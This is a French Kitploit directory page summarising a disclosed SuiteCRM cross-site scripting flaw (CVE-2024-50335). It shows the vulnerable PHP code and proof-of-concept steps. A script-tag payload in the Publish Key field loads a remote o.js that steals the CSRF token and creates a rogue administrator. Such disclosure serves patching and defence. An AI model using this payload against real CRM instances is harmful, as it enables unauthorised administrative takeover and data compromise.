Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-50335 — Une vulnérabilité de sécurité dans SuiteCRM qui peut être exploitée pour voler des jetons CSRF et effectuer des actions non autorisées, telles que la création de nouveaux utilisateurs administrateurs sans authentification appropriée. | Kitploit
Outils/GitHubGitHub/shellkraft/cve-2024-50335
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubshellkraft/cve-2024-50335

CVE-2024-50335

Une vulnérabilité de sécurité dans SuiteCRM qui peut être exploitée pour voler des jetons CSRF et effectuer des actions non autorisées, telles que la création de nouveaux utilisateurs administrateurs sans authentification appropriée.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-50335: XSS authentifié dans le champ « Publish Key » permettant la création non autorisée d'utilisateurs administrateurs

Résumé

Le champ « Publish Key » de la page Edit Profile de SuiteCRM est vulnérable à une Cross-Site Scripting réfléchie (XSS), permettant à un attaquant d'injecter du code JavaScript malveillant. Cela peut être exploité pour voler des jetons CSRF et effectuer des actions non autorisées, telles que la création de nouveaux utilisateurs administrateurs sans authentification appropriée.


Détails

La vulnérabilité provient d'une validation et d'un assainissement insuffisants du champ Publish Key dans l'application SuiteCRM. Lorsqu'un attaquant injecte un script malveillant, celui-ci s'exécute dans le contexte de la session d'un utilisateur authentifié. Le script injecté (o.js) utilise ensuite le jeton CSRF capturé pour forger des requêtes qui créent de nouveaux utilisateurs administrateurs, compromettant ainsi l'intégrité et la sécurité de l'instance CRM.


Impact

Cette vulnérabilité est un problème critique de Cross-Site Scripting (XSS). Son impact comprend :

  1. Accès administratif non autorisé : un attaquant peut créer de nouveaux utilisateurs administrateurs, obtenant potentiellement un contrôle total sur l'instance CRM.
  2. Vol de jeton CSRF : permet d'effectuer des actions non autorisées au nom d'utilisateurs authentifiés.
  • Compromission de l'intégrité des données : la capacité de manipuler les comptes utilisateurs et les paramètres peut entraîner une perte, une fuite ou une modification non autorisée des données.

  • Code source PHP vulnérable

    root@kitploit:~
    $publish_key = $this->bean->getPreference('calendar_publish_key');
    $this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);
    
    $publish_url = $sugar_config['site_url'] . '/vcal_server.php';
    $token = "/";
    
    $publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
    $ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";
    
    $this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
    $this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
    

    PoC

    1. Connectez-vous à SuiteCRM en utilisant des identifiants administrateur valides.
    2. Accédez à Edit Profile : ouvrez la page Edit Profile du compte administrateur.
    3. Dans le champ « Publish Key » sous l'onglet Advanced, injectez le script suivant :
    root@kitploit:~
    <script src=//localhost:1235/o.js>
    
    1. Assurez-vous que o.js est hébergé sur un serveur à localhost sur le port 1235, servant le code d'exploitation comme décrit dans l'extrait de code JavaScript fourni.
    2. Enregistrez les modifications apportées au profil administrateur.
    3. Lors du rechargement de la page SuiteCRM, le script malveillant o.js s'exécute, vole le jeton CSRF et l'utilise pour créer un nouvel utilisateur administrateur avec les identifiants suivants.
    root@kitploit:~
    Username - imposter
    Password - ok
    
    1. Connectez-vous avec les identifiants du nouvel utilisateur administrateur créé pour vérifier le succès de l'exploitation.

    https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197


    Référence

    • https://nvd.nist.gov/vuln/detail/CVE-2024-50335
    • https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-8rw6-g96j-3w7m
    Télécharger l’outil